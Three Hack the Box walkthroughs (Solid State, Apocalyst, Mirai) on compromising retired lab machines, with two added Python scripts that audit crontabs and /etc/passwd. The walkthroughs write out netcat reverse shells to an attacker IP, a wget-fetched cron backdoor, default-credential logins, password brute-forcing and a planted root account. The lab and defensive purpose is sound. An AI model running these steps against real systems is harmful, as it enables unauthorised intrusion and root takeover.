Hack the Box Challenge: Solid State Walkthrough
Hello Friends!! Today we are going to solve a CTF challenge, “Solid State”. It is a lab featured on Hack the Box, which has an amazing collection of online labs on which you can practice your penetration testing skills. The labs range from beginner to expert level. Solid State is a retired lab.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!
As these labs are only available online, they have a static IP. The Solid State lab has IP 10.10.10.51.
Now, as always, let's begin our hacking with port enumeration.
Command: nmap 10.10.10.51 -sV -p- --open
As you can see in the above screenshot, a couple of ports are open, among them ports 80, 110, 119 and 4555.

Port 80 is open, so let's open the IP in our browser to see whether a website is hosted on it.
After opening the IP in the browser we can see that it is a basic website, nothing exciting.
Now back to 4555: it runs the service James Remote Admin 2.3.2. After searching the internet for a while, I found that the default credentials for logging in to the Remote Admin are root:root.
It is a golden rule to try the default credentials, so let's try to get into the Remote Admin using them. For this we will use netcat as shown in the image below.
nc 10.10.10.51 4555
Great, we have logged in to the Remote Admin service. After that we ran the HELP command to get the list of available commands.
Here the listusers command draws our attention; let's see what it does. Great, we have the list of mail users on the server.
Back in the HELP output we had the setpassword command. Let's use it to change the passwords of all the users so that we can enumerate further.
Command: setpassword james 1234
OK, so now we have the users for the POP3 service and their passwords. Let's dig into that, using telnet.
telnet 10.10.10.51 110
User: John
Pass: 1234
LIST
After logging in with the credentials of the user john, we ran the LIST command, which lists all the messages in john's account. Let's see if we find something here.

Nope, hard luck!! We didn't get much from this, but let's try the other users.
Again open a new telnet session, but this time enter the credentials of the user mindy.
telnet 10.10.10.51 110
User: Mindy
Pass: 1234
list
Using LIST we got the mails in mindy's account. Let's open them to see whether a mail gives us a hint to move forward.

After opening the mail we found a message sent from the admin account by James to mindy, sharing her SSH login credentials. Jackpot!!
Username: mindy
Pass: P@55W0rd12@
Let's go and get an SSH shell on the machine, using mindy's credentials to log in.
ssh mindy@10.10.10.51
Cool!! We got access to the victim's PTS shell.
Since we had enumerated the target and found Apache James Server 2.3.2 running, we browsed the internet and stumbled across the Exploit-DB module shown below; copy the whole Python code from there.

Paste the copied Python code into a text file, make the following change inside the payload as highlighted in the image below, and save it; we saved it as exploit.py on the desktop.
nc -e /bin/sh 10.10.14.3 8000
Here 10.10.14.3 is the attacker's IP and 8000 is the port listening for the reverse connection from the target.
Now run the saved Python file as I did, with the command below:
./exploit.py 10.10.10.51
OK, done! The exploit will only work when someone logs in, so let's log in to the SSH shell again using mindy's credentials; as soon as we log in, the exploit starts working, as shown below.
Let's open a netcat listener to catch the shell that will be spawned once our exploit has fully executed. Now we need to use Python to spawn a proper terminal; to do so, type:
python -c "import pty; pty.spawn('/bin/bash')"
Lovely!! So again we got access to the victim's shell, but this time we have a TTY shell. Now let's check the directory.
ls
Here we can see user.txt, which indicates we have almost completed our first challenge.
I used the cat command to read the user.txt file, and with this we completed our first challenge.
Now let's move towards the second challenge, root.txt. Currently we are in mindy's directory; for root.txt we need to get root, but I had no idea what the next step was. Then I recalled that mindy had received a mail from the admin account sent by James, so there was a chance of getting a hint from James; therefore I chose to grep the running processes for James with the following command.
ps aux | grep james
Here the aux options work as described below:
a = display processes for all users
u = show the process's user/owner
x = show processes not attached to a terminal
Great!! It shows a root process running a file in /opt.
Then I moved into the /opt directory and ran ls -al to explore all the files and folders inside it.
cd /opt
ls -al
It showed two files, among which I'm interested in tmp.py.
When I used cat to read this file I found Python code inside it. This code was of no use to me as it was; to make it useful I needed to edit the file by adding my own code to it, so first let's copy this code into a text file.
As you can see in the image below, I edited in a netcat backdoor using the following line, saved the file as tmp.py, and then transferred it to the victim's system.
/bin/nc -e /bin/bash 10.10.14.3 8081
I tried to download the malicious tmp.py directly into /opt, but it failed due to limited permissions, so I first downloaded the file into /tmp using wget.
wget http://10.10.14.4/tmp.py
Once it was downloaded successfully, I copied it over into /opt.
cp tmp.py /opt
cd /opt
ls
Great!! We can see the tmp.py file inside /opt; let's confirm its contents with cat.
cat tmp.py
Yeppii!!! We have successfully uploaded our one-liner netcat backdoor onto the victim's system. Now let's start netcat in a new terminal to receive the reverse connection.
nc -lvp 8081
Then I ran crontab -l to look at the scheduled jobs, and moved back to the netcat terminal.
At netcat you will get the reverse connection about 3 minutes after running the crontab command. We have the root shell, and just by using ls we located root.txt.
Great!! We got our second flag successfully. Enjoy Hacking!!
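The root shell above came from a root cron job executing a script that a low-privileged user could overwrite. As an added example (not code from the write-up), here is the audit a defender would run to catch that misconfiguration: it parses a crontab, pulls out every absolute path in the command field and reports paths whose file or directory permissions let an unprivileged user change what root executes. The crontab text and the staged directory tree are constructed for the demo; writable_reason, audit_crontab and demo are hypothetical names.

```python
import os, stat, tempfile

# Constructed sample crontab in the shape of the root crontab on the box.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
*/3 * * * * python /opt/tmp.py
0 2 * * * /usr/local/sbin/backup.sh --quiet
"""

def command_paths(crontab_text):
    """Yield every absolute path found in the command field of each entry."""
    for line in crontab_text.splitlines():
        fields = line.split(None, 5)   # minute hour dom month dow command
        if len(fields) < 6 or fields[0].startswith("#"):
            continue
        for token in fields[5].split():
            if token.startswith("/"):
                yield token

def writable_reason(path):
    """Return why an unprivileged user could change what cron executes, or ''."""
    if not os.path.exists(path):
        return "target missing: cron will run whatever gets created there"
    reasons = []
    if os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("file is group/world writable")
    dmode = os.stat(os.path.dirname(path)).st_mode
    if dmode & (stat.S_IWGRP | stat.S_IWOTH) and not dmode & stat.S_ISVTX:
        reasons.append("directory allows the file to be replaced")
    return "; ".join(reasons)

def audit_crontab(crontab_text, root=""):
    """Map each risky cron path to its reason; root lets the check run on a staged tree."""
    findings = {}
    for path in command_paths(crontab_text):
        reason = writable_reason(root + path)
        if reason:
            findings[path] = reason
    return findings

def demo():
    """Stage the Solid State layout: world-writable /opt/tmp.py, sane backup.sh."""
    with tempfile.TemporaryDirectory() as tmp:
        for d in ("/opt", "/usr/local/sbin"):
            os.makedirs(tmp + d, mode=0o755)
        for f, mode in (("/opt/tmp.py", 0o777), ("/usr/local/sbin/backup.sh", 0o755)):
            open(tmp + f, "w").close()
            os.chmod(tmp + f, mode)
        return audit_crontab(SAMPLE_CRONTAB, root=tmp)
```

Run audit_crontab on the output of crontab -l (with root left empty) to check a live system; only /opt/tmp.py is reported for the staged tree.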
Hack the Box Challenge: Apocalyst Walkthrough
Hello friends!! Today we are going to solve another CTF challenge, “Apocalyst”, which is available online for those who want to improve their skills in penetration testing and black-box testing. Apocalyst is a retired vulnerable lab presented by Hack the Box for online penetration testing practice according to your experience level; they have a collection of vulnerable labs as challenges from beginner to expert level.
Level: Intermediate
Task: find the user.txt and root.txt files on the victim's machine.
Since these labs are available online, they have static IPs; the IP of Apocalyst is 10.10.10.46, so let's begin with nmap port enumeration.
nmap -sV 10.10.10.46
From the image below, you can observe that we found ports 22 and 80 open on the victim's machine.
Knowing port 80 is open on the victim's machine, we explored the IP in the browser, but didn't get any remarkable clue for the next step from its Apocalypse Preparation blog.
We entered the /etc folder using cd, then ran cat hosts, which gave us the configured hosts.
Next we decided to enter the name of the third host in the browser, which gave us the welcome page of the Apocalyst lab along with the message Apocalypse Preparation Blog.
Now we ran wpscan -u http://apocalyst.htb/ --enumerate t --enumerate p --enumerate u against the URL we entered in the browser, to check for vulnerable themes, plugins and so on.
wpscan enumerated the usernames, where we found the login username falaraki.
Next we used the dirb tool in Kali to enumerate directories using a wordlist. The command we used is dirb http://10.10.10.46/ /root/Desktop/dict.txt.
From that enumeration we found an important directory named Rightiousness.
So next we explored http://10.10.10.46/Rightiousness in the browser, and what we see is an image, as shown below.
The image got us wondering whether there is a clue hidden in it. On second thought we decided to do steganalysis on the image, using steghide --info image.jpg in the Kali terminal, and found that a list.txt file is embedded in the image.

Now we need to extract the list.txt file embedded in the image, so we used steghide --extract -sf image.jpg. We simply leave the passphrase prompt blank and press Enter. The list.txt file has been extracted to our Desktop.
Again we used wpscan, this time to find the password for the username falaraki we obtained earlier. Here we used wpscan -u http://10.10.10.46 --username falaraki --wordlist /root/Desktop/list.txt to try the passwords from list.txt.
We see that for the username falaraki, the matching password is Transclisiation.
After finding the username and password, we used Metasploit's wp_admin_shell_upload exploit to upload a shell and get a meterpreter session, as shown below.
Once we had the meterpreter session, we used ls -la /home to check which directories are in /home. Then we looked inside the falaraki directory with ls -la /home/falaraki, where we found user.txt, and used cat /home/falaraki/user.txt to read its contents, which is our first FLAG!!
Next we ran ls -la in the falaraki directory as shown. Here we discovered a file named .secret, which made us curious to read its contents with cat .secret. It contains base64-encoded content which we need to decode.
To decode the base64 content we used echo “Encoded Content” | base64 -d. This gave us the decoded content, as shown in the image below.
Now let's try to access the user falaraki over SSH with ssh falaraki@10.10.10.46, to find the root flag.
In another terminal we used the LinEnum tool from GitHub, which is well known for finding privilege escalation opportunities. First we downloaded the LinEnum-master.zip file from GitHub. Then we shared the LinEnum-master folder over a simple HTTP server on port 80 using python -m SimpleHTTPServer 80.
Now we download the shared file as the falaraki user using wget http://10.10.14.3/LinEnum.sh. Then we make LinEnum.sh executable with chmod 777 LinEnum.sh and run it with ./LinEnum.sh.
LinEnum showed us all the sensitive files that falaraki can read or write.
In a new terminal we used openssl to generate a salted MD5 password hash for a new user. The command used is openssl passwd -1 -salt raj pass123.
Now, with vi /etc/passwd, we edit the passwd file to add a new user. The line for the new user is username:<salted hash produced above>:0:0:root:/root:/bin/bash, and we save it with :wq.
Now we simply check whether the user has been added successfully. For this we used su - raj, and at the password prompt gave this user's password, pass123. We are finally root on Apocalyst; using ls we see a root.txt file, whose content we read with cat root.txt. Finally we found our final FLAG!!
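The escalation above works because /etc/passwd was writable and a UID 0 entry with an inline hash was appended to it. As an added example (not code from the write-up), here is the check a defender would run over /etc/passwd to detect exactly that: any second UID 0 account, any password hash kept in passwd instead of shadow, and any empty password field. The sample file is constructed and the hash in the raj line is a placeholder, not a real digest; parse_passwd and audit_passwd are hypothetical names.

```python
# Constructed sample /etc/passwd. The 'raj' line has the shape the write-up
# describes (name:<md5-crypt hash>:0:0:root:/root:/bin/bash); the hash itself
# is a placeholder, not a real digest.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
falaraki:x:1000:1000:falaraki,,,:/home/falaraki:/bin/bash
raj:$1$raj$PLACEHOLDERHASH0123456789:0:0:root:/root:/bin/bash
"""

def parse_passwd(text):
    """Parse passwd(5) lines into dicts; malformed lines are kept and flagged."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            records.append({"line": lineno, "malformed": line})
            continue
        records.append({"line": lineno, "name": fields[0], "passwd": fields[1],
                        "uid": int(fields[2]), "gid": int(fields[3]),
                        "shell": fields[6]})
    return records

def audit_passwd(text):
    """Return (account, reason) pairs for entries an intruder typically plants."""
    findings = []
    for r in parse_passwd(text):
        if "malformed" in r:
            findings.append((r["malformed"], "malformed entry"))
            continue
        if r["uid"] == 0 and r["name"] != "root":
            findings.append((r["name"], "second UID 0 account"))
        pw = r["passwd"]
        if pw == "":
            findings.append((r["name"], "empty password field, no password needed"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # Hash kept in world-readable /etc/passwd instead of /etc/shadow.
            findings.append((r["name"], "password hash stored in /etc/passwd"))
    return findings

if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path).read() if path else SAMPLE_PASSWD
    for account, reason in audit_passwd(text):
        print(f"{account}: {reason}")
```

Pass a real passwd file as the first argument to audit a live host; with no argument it audits the constructed sample and reports the raj entry twice.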
Hack the Box Challenge: Mirai Walkthrough
Hello friends!! Today we are going to solve another CTF challenge, “Mirai”, a lab presented by Hack the Box for online penetration testing practice according to your experience level. They have a collection of vulnerable labs as challenges from beginner to expert level. HTB has two partitions of labs, Active and Retired; since we can't publish a write-up of any active lab, we have chosen the retired Mirai lab.
Level: Intermediate
Task: find user.txt and root.txt file in victim’s machine.

Let’s Breach!!!
Lab IP: 10.10.10.48
First, let's enumerate ports to identify the running services and open ports on the victim's machine, using the most popular tool, Nmap.
nmap -p- -A 10.10.10.48 --open
Awesome!! Nmap has done a remarkable job by dumping the details of the services running on open ports 22, 53, 80, 1031, 32400 and 32469.
Without wasting time I used the dirb tool in Kali to enumerate directories and found some important ones such as /admin/.
dirb http://10.10.10.48
So next I decided to explore http://10.10.10.48/admin in the browser. Here we have a login page; let's go through that.
When I clicked on the login tab I saw the following web page. The Pi-hole and its logo give us a pretty big hint that the target machine is a Raspberry Pi, and a Raspberry Pi comes with default SSH credentials.
So we tried the default SSH credentials on the Raspberry Pi.
User: pi
Password: raspberry
Great!! Our prediction worked and we got a PTS shell on the victim's machine.
Now let's look for the user flag.
cd Desktop
ls
Here I found the user.txt file and used the cat command to read it.
cat user.txt

Great!! We got our first flag successfully.
So we found the flag user.txt at the location ~/Desktop/user.txt.
Executing sudo -l tells us that the user pi has full privileges on this machine.
sudo -l
Then I went for root access using the same password, and got root successfully.
sudo bash
After going through the root directory we found a root.txt, but it gave us a hint that our root flag is on a USB stick.
Let's check whether it is mounted with the following command:
df
df (abbreviation for disk free) is a standard Unix command used to display the amount of available disk space for file systems on which the invoking user has appropriate read access (from Wikipedia). As you can see in the screenshot below, we have the USB stick among the devices.
From the image below we can see /media/usbstick.
Then execute the commands below for the next steps.
cd /media/usbstick
ls -al
Here we found a text file, damnit.txt; using cat we can read it.
cat damnit.txt
Oops!! James has accidentally deleted the root.txt file. Now let's try to find it somewhere, with a little hope.
Move back to the root directory and type the following command, which will scan the /dev/sdb file system completely and hopefully find the deleted root.txt as well.
Great!! We got our second flag successfully.

Enjoy Hacking!!